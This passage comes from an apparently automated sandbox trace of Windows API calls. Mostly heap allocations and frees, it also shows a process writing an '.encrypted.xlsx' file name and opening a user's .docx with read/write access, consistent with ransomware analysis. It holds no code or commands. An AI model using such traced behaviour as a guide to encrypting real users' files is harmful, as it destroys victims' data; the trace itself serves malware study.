lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pMd_CmUNe5hcq1EzK.encrypted.xlsx\r\n", lpUsedDefaultChar=0x0) returned 75 [0036.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0036.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0036.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0036.879] WriteFile (in: hFile=0x128, lpBuffer=0x7f36e0*, nNumberOfBytesToWrite=0x4a, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f36e0*, lpNumberOfBytesWritten=0x6aee3c*=0x4a, lpOverlapped=0x0) returned 1 [0036.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0036.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.879] CloseHandle (hObject=0x128) returned 1 [0036.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0036.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0036.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0036.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0036.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0036.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0036.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0036.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0036.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0036.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0036.881] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0036.881] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0036.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0036.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0036.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0036.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0036.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0036.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0036.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0036.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0036.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0036.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0036.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0036.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0036.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0036.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0036.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0036.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0036.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0036.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0036.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0036.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0036.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0036.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0036.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0036.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0036.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0036.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0036.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0036.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0036.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0036.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0036.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0036.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0036.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0036.882] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0036.882] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.882] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0036.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0036.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0036.882] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0036.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0036.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0036.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5a8 [0036.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0036.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0036.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0036.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0036.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0036.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0036.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0036.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889970 [0036.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0036.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0036.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0036.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0036.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0036.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0036.883] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0036.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0036.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0036.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0036.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0036.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0036.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0036.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0036.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0036.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0036.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0036.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0036.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0036.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0036.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0036.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0036.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0036.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0036.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0036.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0036.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0036.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0036.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0036.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0036.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0036.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0036.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0036.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0036.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0036.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0036.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0036.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0036.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0036.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0036.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0036.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0036.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0036.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0036.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0036.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0036.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0036.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0036.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0036.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0036.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0036.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0036.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0036.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0036.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0036.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0036.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0036.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0036.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0036.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0036.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0036.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0036.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0036.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0036.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0036.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0036.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0036.886] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0036.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0036.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0036.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0036.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0036.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0036.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0036.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0036.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0036.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0036.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0036.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0036.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0036.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0036.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0036.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0036.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0036.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0036.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0036.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0036.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0036.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0036.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0036.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0036.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0036.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0036.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0036.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0036.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0036.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0036.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0036.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0036.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0036.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0036.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0036.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0036.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0036.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0036.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0036.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0036.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0036.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0036.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0036.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0036.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0036.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0036.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0036.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0036.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0036.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0036.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0036.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0036.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0036.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0036.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0036.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0036.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0036.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0036.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.888] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0036.889] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XTFgSi8S58kpp1FfY.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xtfgsi8s58kpp1ffy.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, 